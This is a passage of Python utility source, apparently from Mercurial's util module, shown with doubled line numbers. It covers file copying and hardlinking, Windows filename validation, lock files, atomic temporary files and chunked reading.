1849 1849 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1850 1850 return os.path.join(root, localpath(n2))
1851 1851 n2 = b'/'.join((pconvert(root), n2))
1852 1852 a, b = splitpath(n1), n2.split(b'/')
1853 1853 a.reverse()
1854 1854 b.reverse()
1855 1855 while a and b and a[-1] == b[-1]:
1856 1856 a.pop()
1857 1857 b.pop()
1858 1858 b.reverse()
1859 1859 return pycompat.ossep.join(([b'..'] * len(a)) + b) or b'.'
1860 1860
1861 1861
1862 1862 def checksignature(func, depth=1):
1863 1863 '''wrap a function with code to check for calling errors'''
1864 1864
1865 1865 def check(*args, **kwargs):
1866 1866 try:
1867 1867 return func(*args, **kwargs)
1868 1868 except TypeError:
1869 1869 if len(traceback.extract_tb(sys.exc_info()[2])) == depth:
1870 1870 raise error.SignatureError
1871 1871 raise
1872 1872
1873 1873 return check
1874 1874
1875 1875
1876 1876 # a whilelist of known filesystems where hardlink works reliably
1877 1877 _hardlinkfswhitelist = {
1878 1878 b'apfs',
1879 1879 b'btrfs',
1880 1880 b'ext2',
1881 1881 b'ext3',
1882 1882 b'ext4',
1883 1883 b'hfs',
1884 1884 b'jfs',
1885 1885 b'NTFS',
1886 1886 b'reiserfs',
1887 1887 b'tmpfs',
1888 1888 b'ufs',
1889 1889 b'xfs',
1890 1890 b'zfs',
1891 1891 }
1892 1892
1893 1893
1894 1894 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1895 1895 '''copy a file, preserving mode and optionally other stat info like
1896 1896 atime/mtime
1897 1897
1898 1898 checkambig argument is used with filestat, and is useful only if
1899 1899 destination file is guarded by any lock (e.g. repo.lock or
1900 1900 repo.wlock).
1901 1901
1902 1902 copystat and checkambig should be exclusive.
1903 1903 '''
1904 1904 assert not (copystat and checkambig)
1905 1905 oldstat = None
1906 1906 if os.path.lexists(dest):
1907 1907 if checkambig:
1908 1908 oldstat = checkambig and filestat.frompath(dest)
1909 1909 unlink(dest)
1910 1910 if hardlink:
1911 1911 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1912 1912 # unless we are confident that dest is on a whitelisted filesystem.
1913 1913 try:
1914 1914 fstype = getfstype(os.path.dirname(dest))
1915 1915 except OSError:
1916 1916 fstype = None
1917 1917 if fstype not in _hardlinkfswhitelist:
1918 1918 hardlink = False
1919 1919 if hardlink:
1920 1920 try:
1921 1921 oslink(src, dest)
1922 1922 return
1923 1923 except (IOError, OSError):
1924 1924 pass # fall back to normal copy
1925 1925 if os.path.islink(src):
1926 1926 os.symlink(os.readlink(src), dest)
1927 1927 # copytime is ignored for symlinks, but in general copytime isn't needed
1928 1928 # for them anyway
1929 1929 else:
1930 1930 try:
1931 1931 shutil.copyfile(src, dest)
1932 1932 if copystat:
1933 1933 # copystat also copies mode
1934 1934 shutil.copystat(src, dest)
1935 1935 else:
1936 1936 shutil.copymode(src, dest)
1937 1937 if oldstat and oldstat.stat:
1938 1938 newstat = filestat.frompath(dest)
1939 1939 if newstat.isambig(oldstat):
1940 1940 # stat of copied file is ambiguous to original one
1941 1941 advanced = (
1942 1942 oldstat.stat[stat.ST_MTIME] + 1
1943 1943 ) & 0x7FFFFFFF
1944 1944 os.utime(dest, (advanced, advanced))
1945 1945 except shutil.Error as inst:
1946 1946 raise error.Abort(stringutil.forcebytestr(inst))
1947 1947
1948 1948
1949 1949 def copyfiles(src, dst, hardlink=None, progress=None):
1950 1950 """Copy a directory tree using hardlinks if possible."""
1951 1951 num = 0
1952 1952
1953 1953 def settopic():
1954 1954 if progress:
1955 1955 progress.topic = _(b'linking') if hardlink else _(b'copying')
1956 1956
1957 1957 if os.path.isdir(src):
1958 1958 if hardlink is None:
1959 1959 hardlink = (
1960 1960 os.stat(src).st_dev == os.stat(os.path.dirname(dst)).st_dev
1961 1961 )
1962 1962 settopic()
1963 1963 os.mkdir(dst)
1964 1964 for name, kind in listdir(src):
1965 1965 srcname = os.path.join(src, name)
1966 1966 dstname = os.path.join(dst, name)
1967 1967 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1968 1968 num += n
1969 1969 else:
1970 1970 if hardlink is None:
1971 1971 hardlink = (
1972 1972 os.stat(os.path.dirname(src)).st_dev
1973 1973 == os.stat(os.path.dirname(dst)).st_dev
1974 1974 )
1975 1975 settopic()
1976 1976
1977 1977 if hardlink:
1978 1978 try:
1979 1979 oslink(src, dst)
1980 1980 except (IOError, OSError):
1981 1981 hardlink = False
1982 1982 shutil.copy(src, dst)
1983 1983 else:
1984 1984 shutil.copy(src, dst)
1985 1985 num += 1
1986 1986 if progress:
1987 1987 progress.increment()
1988 1988
1989 1989 return hardlink, num
1990 1990
1991 1991
1992 1992 _winreservednames = {
1993 1993 b'con',
1994 1994 b'prn',
1995 1995 b'aux',
1996 1996 b'nul',
1997 1997 b'com1',
1998 1998 b'com2',
1999 1999 b'com3',
2000 2000 b'com4',
2001 2001 b'com5',
2002 2002 b'com6',
2003 2003 b'com7',
2004 2004 b'com8',
2005 2005 b'com9',
2006 2006 b'lpt1',
2007 2007 b'lpt2',
2008 2008 b'lpt3',
2009 2009 b'lpt4',
2010 2010 b'lpt5',
2011 2011 b'lpt6',
2012 2012 b'lpt7',
2013 2013 b'lpt8',
2014 2014 b'lpt9',
2015 2015 }
2016 2016 _winreservedchars = b':*?"<>|'
2017 2017
2018 2018
2019 2019 def checkwinfilename(path):
2020 2020 r'''Check that the base-relative path is a valid filename on Windows.
2021 2021 Returns None if the path is ok, or a UI string describing the problem.
2022 2022
2023 2023 >>> checkwinfilename(b"just/a/normal/path")
2024 2024 >>> checkwinfilename(b"foo/bar/con.xml")
2025 2025 "filename contains 'con', which is reserved on Windows"
2026 2026 >>> checkwinfilename(b"foo/con.xml/bar")
2027 2027 "filename contains 'con', which is reserved on Windows"
2028 2028 >>> checkwinfilename(b"foo/bar/xml.con")
2029 2029 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
2030 2030 "filename contains 'AUX', which is reserved on Windows"
2031 2031 >>> checkwinfilename(b"foo/bar/bla:.txt")
2032 2032 "filename contains ':', which is reserved on Windows"
2033 2033 >>> checkwinfilename(b"foo/bar/b\07la.txt")
2034 2034 "filename contains '\\x07', which is invalid on Windows"
2035 2035 >>> checkwinfilename(b"foo/bar/bla ")
2036 2036 "filename ends with ' ', which is not allowed on Windows"
2037 2037 >>> checkwinfilename(b"../bar")
2038 2038 >>> checkwinfilename(b"foo\\")
2039 2039 "filename ends with '\\', which is invalid on Windows"
2040 2040 >>> checkwinfilename(b"foo\\/bar")
2041 2041 "directory name ends with '\\', which is invalid on Windows"
2042 2042 '''
2043 2043 if path.endswith(b'\\'):
2044 2044 return _(b"filename ends with '\\', which is invalid on Windows")
2045 2045 if b'\\/' in path:
2046 2046 return _(b"directory name ends with '\\', which is invalid on Windows")
2047 2047 for n in path.replace(b'\\', b'/').split(b'/'):
2048 2048 if not n:
2049 2049 continue
2050 2050 for c in _filenamebytestr(n):
2051 2051 if c in _winreservedchars:
2052 2052 return (
2053 2053 _(
2054 2054 b"filename contains '%s', which is reserved "
2055 2055 b"on Windows"
2056 2056 )
2057 2057 % c
2058 2058 )
2059 2059 if ord(c) <= 31:
2060 2060 return _(
2061 2061 b"filename contains '%s', which is invalid on Windows"
2062 2062 ) % stringutil.escapestr(c)
2063 2063 base = n.split(b'.')[0]
2064 2064 if base and base.lower() in _winreservednames:
2065 2065 return (
2066 2066 _(b"filename contains '%s', which is reserved on Windows")
2067 2067 % base
2068 2068 )
2069 2069 t = n[-1:]
2070 2070 if t in b'. ' and n not in b'..':
2071 2071 return (
2072 2072 _(
2073 2073 b"filename ends with '%s', which is not allowed "
2074 2074 b"on Windows"
2075 2075 )
2076 2076 % t
2077 2077 )
2078 2078
2079 2079
2080 2080 timer = getattr(time, "perf_counter", None)
2081 2081
2082 2082 if pycompat.iswindows:
2083 2083 checkosfilename = checkwinfilename
2084 2084 if not timer:
2085 2085 timer = time.clock
2086 2086 else:
2087 2087 # mercurial.windows doesn't have platform.checkosfilename
2088 2088 checkosfilename = platform.checkosfilename # pytype: disable=module-attr
2089 2089 if not timer:
2090 2090 timer = time.time
2091 2091
2092 2092
2093 2093 def makelock(info, pathname):
2094 2094 """Create a lock file atomically if possible
2095 2095
2096 2096 This may leave a stale lock file if symlink isn't supported and signal
2097 2097 interrupt is enabled.
2098 2098 """
2099 2099 try:
2100 2100 return os.symlink(info, pathname)
2101 2101 except OSError as why:
2102 2102 if why.errno == errno.EEXIST:
2103 2103 raise
2104 2104 except AttributeError: # no symlink in os
2105 2105 pass
2106 2106
2107 2107 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
2108 2108 ld = os.open(pathname, flags)
2109 2109 os.write(ld, info)
2110 2110 os.close(ld)
2111 2111
2112 2112
2113 2113 def readlock(pathname):
2114 2114 try:
2115 2115 return readlink(pathname)
2116 2116 except OSError as why:
2117 2117 if why.errno not in (errno.EINVAL, errno.ENOSYS):
2118 2118 raise
2119 2119 except AttributeError: # no symlink in os
2120 2120 pass
2121 2121 with posixfile(pathname, b'rb') as fp:
2122 2122 return fp.read()
2123 2123
2124 2124
2125 2125 def fstat(fp):
2126 2126 '''stat file object that may not have fileno method.'''
2127 2127 try:
2128 2128 return os.fstat(fp.fileno())
2129 2129 except AttributeError:
2130 2130 return os.stat(fp.name)
2131 2131
2132 2132
2133 2133 # File system features
2134 2134
2135 2135
2136 2136 def fscasesensitive(path):
2137 2137 """
2138 2138 Return true if the given path is on a case-sensitive filesystem
2139 2139
2140 2140 Requires a path (like /foo/.hg) ending with a foldable final
2141 2141 directory component.
2142 2142 """
2143 2143 s1 = os.lstat(path)
2144 2144 d, b = os.path.split(path)
2145 2145 b2 = b.upper()
2146 2146 if b == b2:
2147 2147 b2 = b.lower()
2148 2148 if b == b2:
2149 2149 return True # no evidence against case sensitivity
2150 2150 p2 = os.path.join(d, b2)
2151 2151 try:
2152 2152 s2 = os.lstat(p2)
2153 2153 if s2 == s1:
2154 2154 return False
2155 2155 return True
2156 2156 except OSError:
2157 2157 return True
2158 2158
2159 2159
2160 2160 try:
2161 2161 import re2 # pytype: disable=import-error
2162 2162
2163 2163 _re2 = None
2164 2164 except ImportError:
2165 2165 _re2 = False
2166 2166
2167 2167
2168 2168 class _re(object):
2169 2169 def _checkre2(self):
2170 2170 global _re2
2171 2171 try:
2172 2172 # check if match works, see issue3964
2173 2173 _re2 = bool(re2.match(r'\[([^\[]+)\]', b'[ui]'))
2174 2174 except ImportError:
2175 2175 _re2 = False
2176 2176
2177 2177 def compile(self, pat, flags=0):
2178 2178 '''Compile a regular expression, using re2 if possible
2179 2179
2180 2180 For best performance, use only re2-compatible regexp features. The
2181 2181 only flags from the re module that are re2-compatible are
2182 2182 IGNORECASE and MULTILINE.'''
2183 2183 if _re2 is None:
2184 2184 self._checkre2()
2185 2185 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
2186 2186 if flags & remod.IGNORECASE:
2187 2187 pat = b'(?i)' + pat
2188 2188 if flags & remod.MULTILINE:
2189 2189 pat = b'(?m)' + pat
2190 2190 try:
2191 2191 return re2.compile(pat)
2192 2192 except re2.error:
2193 2193 pass
2194 2194 return remod.compile(pat, flags)
2195 2195
2196 2196 @propertycache
2197 2197 def escape(self):
2198 2198 '''Return the version of escape corresponding to self.compile.
2199 2199
2200 2200 This is imperfect because whether re2 or re is used for a particular
2201 2201 function depends on the flags, etc, but it's the best we can do.
2202 2202 '''
2203 2203 global _re2
2204 2204 if _re2 is None:
2205 2205 self._checkre2()
2206 2206 if _re2:
2207 2207 return re2.escape
2208 2208 else:
2209 2209 return remod.escape
2210 2210
2211 2211
2212 2212 re = _re()
2213 2213
2214 2214 _fspathcache = {}
2215 2215
2216 2216
2217 2217 def fspath(name, root):
2218 2218 '''Get name in the case stored in the filesystem
2219 2219
2220 2220 The name should be relative to root, and be normcase-ed for efficiency.
2221 2221
2222 2222 Note that this function is unnecessary, and should not be
2223 2223 called, for case-sensitive filesystems (simply because it's expensive).
2224 2224
2225 2225 The root should be normcase-ed, too.
2226 2226 '''
2227 2227
2228 2228 def _makefspathcacheentry(dir):
2229 2229 return {normcase(n): n for n in os.listdir(dir)}
2230 2230
2231 2231 seps = pycompat.ossep
2232 2232 if pycompat.osaltsep:
2233 2233 seps = seps + pycompat.osaltsep
2234 2234 # Protect backslashes. This gets silly very quickly.
2235 2235 seps.replace(b'\\', b'\\\\')
2236 2236 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
2237 2237 dir = os.path.normpath(root)
2238 2238 result = []
2239 2239 for part, sep in pattern.findall(name):
2240 2240 if sep:
2241 2241 result.append(sep)
2242 2242 continue
2243 2243
2244 2244 if dir not in _fspathcache:
2245 2245 _fspathcache[dir] = _makefspathcacheentry(dir)
2246 2246 contents = _fspathcache[dir]
2247 2247
2248 2248 found = contents.get(part)
2249 2249 if not found:
2250 2250 # retry "once per directory" per "dirstate.walk" which
2251 2251 # may take place for each patches of "hg qpush", for example
2252 2252 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2253 2253 found = contents.get(part)
2254 2254
2255 2255 result.append(found or part)
2256 2256 dir = os.path.join(dir, part)
2257 2257
2258 2258 return b''.join(result)
2259 2259
2260 2260
2261 2261 def checknlink(testfile):
2262 2262 '''check whether hardlink count reporting works properly'''
2263 2263
2264 2264 # testfile may be open, so we need a separate file for checking to
2265 2265 # work around issue2543 (or testfile may get lost on Samba shares)
2266 2266 f1, f2, fp = None, None, None
2267 2267 try:
2268 2268 fd, f1 = pycompat.mkstemp(
2269 2269 prefix=b'.%s-' % os.path.basename(testfile),
2270 2270 suffix=b'1~',
2271 2271 dir=os.path.dirname(testfile),
2272 2272 )
2273 2273 os.close(fd)
2274 2274 f2 = b'%s2~' % f1[:-2]
2275 2275
2276 2276 oslink(f1, f2)
2277 2277 # nlinks() may behave differently for files on Windows shares if
2278 2278 # the file is open.
2279 2279 fp = posixfile(f2)
2280 2280 return nlinks(f2) > 1
2281 2281 except OSError:
2282 2282 return False
2283 2283 finally:
2284 2284 if fp is not None:
2285 2285 fp.close()
2286 2286 for f in (f1, f2):
2287 2287 try:
2288 2288 if f is not None:
2289 2289 os.unlink(f)
2290 2290 except OSError:
2291 2291 pass
2292 2292
2293 2293
2294 2294 def endswithsep(path):
2295 2295 '''Check path ends with os.sep or os.altsep.'''
2296 2296 return (
2297 2297 path.endswith(pycompat.ossep)
2298 2298 or pycompat.osaltsep
2299 2299 and path.endswith(pycompat.osaltsep)
2300 2300 )
2301 2301
2302 2302
2303 2303 def splitpath(path):
2304 2304 '''Split path by os.sep.
2305 2305 Note that this function does not use os.altsep because this is
2306 2306 an alternative of simple "xxx.split(os.sep)".
2307 2307 It is recommended to use os.path.normpath() before using this
2308 2308 function if need.'''
2309 2309 return path.split(pycompat.ossep)
2310 2310
2311 2311
2312 2312 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2313 2313 """Create a temporary file with the same contents from name
2314 2314
2315 2315 The permission bits are copied from the original file.
2316 2316
2317 2317 If the temporary file is going to be truncated immediately, you
2318 2318 can use emptyok=True as an optimization.
2319 2319
2320 2320 Returns the name of the temporary file.
2321 2321 """
2322 2322 d, fn = os.path.split(name)
2323 2323 fd, temp = pycompat.mkstemp(prefix=b'.%s-' % fn, suffix=b'~', dir=d)
2324 2324 os.close(fd)
2325 2325 # Temporary files are created with mode 0600, which is usually not
2326 2326 # what we want. If the original file already exists, just copy
2327 2327 # its mode. Otherwise, manually obey umask.
2328 2328 copymode(name, temp, createmode, enforcewritable)
2329 2329
2330 2330 if emptyok:
2331 2331 return temp
2332 2332 try:
2333 2333 try:
2334 2334 ifp = posixfile(name, b"rb")
2335 2335 except IOError as inst:
2336 2336 if inst.errno == errno.ENOENT:
2337 2337 return temp
2338 2338 if not getattr(inst, 'filename', None):
2339 2339 inst.filename = name
2340 2340 raise
2341 2341 ofp = posixfile(temp, b"wb")
2342 2342 for chunk in filechunkiter(ifp):
2343 2343 ofp.write(chunk)
2344 2344 ifp.close()
2345 2345 ofp.close()
2346 2346 except: # re-raises
2347 2347 try:
2348 2348 os.unlink(temp)
2349 2349 except OSError:
2350 2350 pass
2351 2351 raise
2352 2352 return temp
2353 2353
2354 2354
2355 2355 class filestat(object):
2356 2356 """help to exactly detect change of a file
2357 2357
2358 2358 'stat' attribute is result of 'os.stat()' if specified 'path'
2359 2359 exists. Otherwise, it is None. This can avoid preparative
2360 2360 'exists()' examination on client side of this class.
2361 2361 """
2362 2362
2363 2363 def __init__(self, stat):
2364 2364 self.stat = stat
2365 2365
2366 2366 @classmethod
2367 2367 def frompath(cls, path):
2368 2368 try:
2369 2369 stat = os.stat(path)
2370 2370 except OSError as err:
2371 2371 if err.errno != errno.ENOENT:
2372 2372 raise
2373 2373 stat = None
2374 2374 return cls(stat)
2375 2375
2376 2376 @classmethod
2377 2377 def fromfp(cls, fp):
2378 2378 stat = os.fstat(fp.fileno())
2379 2379 return cls(stat)
2380 2380
2381 2381 __hash__ = object.__hash__
2382 2382
2383 2383 def __eq__(self, old):
2384 2384 try:
2385 2385 # if ambiguity between stat of new and old file is
2386 2386 # avoided, comparison of size, ctime and mtime is enough
2387 2387 # to exactly detect change of a file regardless of platform
2388 2388 return (
2389 2389 self.stat.st_size == old.stat.st_size
2390 2390 and self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2391 2391 and self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME]
2392 2392 )
2393 2393 except AttributeError:
2394 2394 pass
2395 2395 try:
2396 2396 return self.stat is None and old.stat is None
2397 2397 except AttributeError:
2398 2398 return False
2399 2399
2400 2400 def isambig(self, old):
2401 2401 """Examine whether new (= self) stat is ambiguous against old one
2402 2402
2403 2403 "S[N]" below means stat of a file at N-th change:
2404 2404
2405 2405 - S[n-1].ctime < S[n].ctime: can detect change of a file
2406 2406 - S[n-1].ctime == S[n].ctime
2407 2407 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2408 2408 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2409 2409 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2410 2410 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2411 2411
2412 2412 Case (*2) above means that a file was changed twice or more at
2413 2413 same time in sec (= S[n-1].ctime), and comparison of timestamp
2414 2414 is ambiguous.
2415 2415
2416 2416 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2417 2417 timestamp is ambiguous".
2418 2418
2419 2419 But advancing mtime only in case (*2) doesn't work as
2420 2420 expected, because naturally advanced S[n].mtime in case (*1)
2421 2421 might be equal to manually advanced S[n-1 or earlier].mtime.
2422 2422
2423 2423 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2424 2424 treated as ambiguous regardless of mtime, to avoid overlooking
2425 2425 by confliction between such mtime.
2426 2426
2427 2427 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2428 2428 S[n].mtime", even if size of a file isn't changed.
2429 2429 """
2430 2430 try:
2431 2431 return self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2432 2432 except AttributeError:
2433 2433 return False
2434 2434
2435 2435 def avoidambig(self, path, old):
2436 2436 """Change file stat of specified path to avoid ambiguity
2437 2437
2438 2438 'old' should be previous filestat of 'path'.
2439 2439
2440 2440 This skips avoiding ambiguity, if a process doesn't have
2441 2441 appropriate privileges for 'path'. This returns False in this
2442 2442 case.
2443 2443
2444 2444 Otherwise, this returns True, as "ambiguity is avoided".
2445 2445 """
2446 2446 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2447 2447 try:
2448 2448 os.utime(path, (advanced, advanced))
2449 2449 except OSError as inst:
2450 2450 if inst.errno == errno.EPERM:
2451 2451 # utime() on the file created by another user causes EPERM,
2452 2452 # if a process doesn't have appropriate privileges
2453 2453 return False
2454 2454 raise
2455 2455 return True
2456 2456
2457 2457 def __ne__(self, other):
2458 2458 return not self == other
2459 2459
2460 2460
2461 2461 class atomictempfile(object):
2462 2462 '''writable file object that atomically updates a file
2463 2463
2464 2464 All writes will go to a temporary copy of the original file. Call
2465 2465 close() when you are done writing, and atomictempfile will rename
2466 2466 the temporary copy to the original name, making the changes
2467 2467 visible. If the object is destroyed without being closed, all your
2468 2468 writes are discarded.
2469 2469
2470 2470 checkambig argument of constructor is used with filestat, and is
2471 2471 useful only if target file is guarded by any lock (e.g. repo.lock
2472 2472 or repo.wlock).
2473 2473 '''
2474 2474
2475 2475 def __init__(self, name, mode=b'w+b', createmode=None, checkambig=False):
2476 2476 self.__name = name # permanent name
2477 2477 self._tempname = mktempcopy(
2478 2478 name,
2479 2479 emptyok=(b'w' in mode),
2480 2480 createmode=createmode,
2481 2481 enforcewritable=(b'w' in mode),
2482 2482 )
2483 2483
2484 2484 self._fp = posixfile(self._tempname, mode)
2485 2485 self._checkambig = checkambig
2486 2486
2487 2487 # delegated methods
2488 2488 self.read = self._fp.read
2489 2489 self.write = self._fp.write
2490 2490 self.seek = self._fp.seek
2491 2491 self.tell = self._fp.tell
2492 2492 self.fileno = self._fp.fileno
2493 2493
2494 2494 def close(self):
2495 2495 if not self._fp.closed:
2496 2496 self._fp.close()
2497 2497 filename = localpath(self.__name)
2498 2498 oldstat = self._checkambig and filestat.frompath(filename)
2499 2499 if oldstat and oldstat.stat:
2500 2500 rename(self._tempname, filename)
2501 2501 newstat = filestat.frompath(filename)
2502 2502 if newstat.isambig(oldstat):
2503 2503 # stat of changed file is ambiguous to original one
2504 2504 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2505 2505 os.utime(filename, (advanced, advanced))
2506 2506 else:
2507 2507 rename(self._tempname, filename)
2508 2508
2509 2509 def discard(self):
2510 2510 if not self._fp.closed:
2511 2511 try:
2512 2512 os.unlink(self._tempname)
2513 2513 except OSError:
2514 2514 pass
2515 2515 self._fp.close()
2516 2516
2517 2517 def __del__(self):
2518 2518 if safehasattr(self, '_fp'): # constructor actually did something
2519 2519 self.discard()
2520 2520
2521 2521 def __enter__(self):
2522 2522 return self
2523 2523
2524 2524 def __exit__(self, exctype, excvalue, traceback):
2525 2525 if exctype is not None:
2526 2526 self.discard()
2527 2527 else:
2528 2528 self.close()
2529 2529
2530 2530
2531 2531 def unlinkpath(f, ignoremissing=False, rmdir=True):
2532 2532 """unlink and remove the directory if it is empty"""
2533 2533 if ignoremissing:
2534 2534 tryunlink(f)
2535 2535 else:
2536 2536 unlink(f)
2537 2537 if rmdir:
2538 2538 # try removing directories that might now be empty
2539 2539 try:
2540 2540 removedirs(os.path.dirname(f))
2541 2541 except OSError:
2542 2542 pass
2543 2543
2544 2544
2545 2545 def tryunlink(f):
2546 2546 """Attempt to remove a file, ignoring ENOENT errors."""
2547 2547 try:
2548 2548 unlink(f)
2549 2549 except OSError as e:
2550 2550 if e.errno != errno.ENOENT:
2551 2551 raise
2552 2552
2553 2553
2554 2554 def makedirs(name, mode=None, notindexed=False):
2555 2555 """recursive directory creation with parent mode inheritance
2556 2556
2557 2557 Newly created directories are marked as "not to be indexed by
2558 2558 the content indexing service", if ``notindexed`` is specified
2559 2559 for "write" mode access.
2560 2560 """
2561 2561 try:
2562 2562 makedir(name, notindexed)
2563 2563 except OSError as err:
2564 2564 if err.errno == errno.EEXIST:
2565 2565 return
2566 2566 if err.errno != errno.ENOENT or not name:
2567 2567 raise
2568 2568 parent = os.path.dirname(os.path.abspath(name))
2569 2569 if parent == name:
2570 2570 raise
2571 2571 makedirs(parent, mode, notindexed)
2572 2572 try:
2573 2573 makedir(name, notindexed)
2574 2574 except OSError as err:
2575 2575 # Catch EEXIST to handle races
2576 2576 if err.errno == errno.EEXIST:
2577 2577 return
2578 2578 raise
2579 2579 if mode is not None:
2580 2580 os.chmod(name, mode)
2581 2581
2582 2582
2583 2583 def readfile(path):
2584 2584 with open(path, b'rb') as fp:
2585 2585 return fp.read()
2586 2586
2587 2587
2588 2588 def writefile(path, text):
2589 2589 with open(path, b'wb') as fp:
2590 2590 fp.write(text)
2591 2591
2592 2592
2593 2593 def appendfile(path, text):
2594 2594 with open(path, b'ab') as fp:
2595 2595 fp.write(text)
2596 2596
2597 2597
2598 2598 class chunkbuffer(object):
2599 2599 """Allow arbitrary sized chunks of data to be efficiently read from an
2600 2600 iterator over chunks of arbitrary size."""
2601 2601
2602 2602 def __init__(self, in_iter):
2603 2603 """in_iter is the iterator that's iterating over the input chunks."""
2604 2604
2605 2605 def splitbig(chunks):
2606 2606 for chunk in chunks:
2607 2607 if len(chunk) > 2 ** 20:
2608 2608 pos = 0
2609 2609 while pos < len(chunk):
2610 2610 end = pos + 2 ** 18
2611 2611 yield chunk[pos:end]
2612 2612 pos = end
2613 2613 else:
2614 2614 yield chunk
2615 2615
2616 2616 self.iter = splitbig(in_iter)
2617 2617 self._queue = collections.deque()
2618 2618 self._chunkoffset = 0
2619 2619
2620 2620 def read(self, l=None):
2621 2621 """Read L bytes of data from the iterator of chunks of data.
2622 2622 Returns less than L bytes if the iterator runs dry.
2623 2623
2624 2624 If size parameter is omitted, read everything"""
2625 2625 if l is None:
2626 2626 return b''.join(self.iter)
2627 2627
2628 2628 left = l
2629 2629 buf = []
2630 2630 queue = self._queue
2631 2631 while left > 0:
2632 2632 # refill the queue
2633 2633 if not queue:
2634 2634 target = 2 ** 18
2635 2635 for chunk in self.iter:
2636 2636 queue.append(chunk)
2637 2637 target -= len(chunk)
2638 2638 if target <= 0:
2639 2639 break
2640 2640 if not queue:
2641 2641 break
2642 2642
2643 2643 # The easy way to do this would be to queue.popleft(), modify the
2644 2644 # chunk (if necessary), then queue.appendleft(). However, for cases
2645 2645 # where we read partial chunk content, this incurs 2 dequeue
2646 2646 # mutations and creates a new str for the remaining chunk in the
2647 2647 # queue. Our code below avoids this overhead.
2648 2648
2649 2649 chunk = queue[0]
2650 2650 chunkl = len(chunk)
2651 2651 offset = self._chunkoffset
2652 2652
2653 2653 # Use full chunk.
2654 2654 if offset == 0 and left >= chunkl:
2655 2655 left -= chunkl
2656 2656 queue.popleft()
2657 2657 buf.append(chunk)
2658 2658 # self._chunkoffset remains at 0.
2659 2659 continue
2660 2660
2661 2661 chunkremaining = chunkl - offset
2662 2662
2663 2663 # Use all of unconsumed part of chunk.
2664 2664 if left >= chunkremaining:
2665 2665 left -= chunkremaining
2666 2666 queue.popleft()
2667 2667 # offset == 0 is enabled by block above, so this won't merely
2668 2668 # copy via ``chunk[0:]``.
2669 2669 buf.append(chunk[offset:])
2670 2670 self._chunkoffset = 0
2671 2671
2672 2672 # Partial chunk needed.
2673 2673 else:
2674 2674 buf.append(chunk[offset : offset + left])
2675 2675 self._chunkoffset += left
2676 2676 left -= chunkremaining
2677 2677
2678 2678 return b''.join(buf)
2679 2679
2680 2680
2681 2681 def filechunkiter(f, size=131072, limit=None):
2682 2682 """Create a generator that produces the data in the file size
2683 2683 (default 131072) bytes at a time, up to optional limit (default is
2684 2684 to read all data). Chunks may be less than size bytes if the
2685 2685 chunk is the last chunk in the file, or the file is a socket or
2686 2686 some other type of file that sometimes reads less data than is
2687 2687 requested."""
2688 2688 assert size >= 0
2689 2689 assert limit is None or limit >= 0
2690 2690 while True:
2691 2691 if limit is None:
2692 2692 nbytes = size
2693 2693 else:
2694 2694 nbytes = min(limit, size)
2695 2695 s = nbytes and f.read(nbytes)
2696 2696 if not s:
2697 2697 break
2698 2698 if limit:
2699 2699 limit -= len(s)
2700 2700 yield s
2701 2701
2702 2702
2703 2703 class cappedreader(object):
2704 2704 """A file object proxy that allows reading up to N bytes.
2705 2705
2706 2706 Given a source file object, instances of this type allow reading up to
2707 2707 N bytes from that source file object. Attempts to read past the allowed
2708 2708 limit are treated as EOF.
2709 2709
2710 2710 It is assumed that I/O is not performed on the original file object
2711 2711 in addition to I/O that is performed by this instance. If there is,
2712 2712 state tracking will get out of sync and unexpected results will ensue.
2713 2713 """
2714 2714
2715 2715 def __init__(self, fh, limit):
2716 2716 """Allow reading up to <limit> bytes from <fh>."""
2717 2717 self._fh = fh
2718 2718 self._left = limit
2719 2719
2720 2720 def read(self, n=-1):
2721 2721 if not self._left:
2722 2722 return b''
2723 2723
2724 2724 if n < 0:
2725 2725 n = self._left
2726 2726
2727 2727 data = self._fh.read(min(n, self._left))
2728 2728 self._left -= len(data)
2729 2729 assert self._left >= 0
2730 2730
2731 2731 return data
2732 2732
2733 2733 def readinto(self, b):
2734 2734 res = self.read(len(b))
2735 2735 if res is None:
2736 2736 return None
2737 2737
2738 2738 b[0 : len(res)] = res
2739 2739 return len(res)
2740 2740
2741 2741
2742 2742 def unitcountfn(*unittable):
2743 2743 '''return a function that renders a readable count of some quantity'''
2744 2744
2745 2745 def go(count):
2746 2746 for multiplier, divisor, format in unittable:
2747 2747 if abs(count) >= divisor * multiplier:
2748 2748 return format % (count / float(divisor))
2749 2749 return unittable[-1][2] % count
2750 2750
2751 2751 return go
2752 2752
2753 2753
2754 2754 def processlinerange(fromline, toline):
2755 2755 """Check that linerange <fromline>:<toline> makes sense and return a
2756 2756 0-based range.
2757 2757
2758 2758 >>> processlinerange(10, 20)
2759 2759 (9, 20)
2760 2760 >>> processlinerange(2, 1)
2761 2761 Traceback (most recent call last):
2762 2762 ...
2763 2763 ParseError: line range must be positive
2764 2764 >>> processlinerange(0, 5)
2765 2765 Traceback (most recent call last):
2766 2766 ...
2767 2767 ParseError: fromline must be strictly positive
2768 2768 """
2769 2769 if toline - fromline < 0:
2770 2770 raise error.ParseError(_(b"line range must be positive"))
2771 2771 if fromline < 1:
2772 2772 raise error.ParseError(_(b"fromline must be strictly positive"))
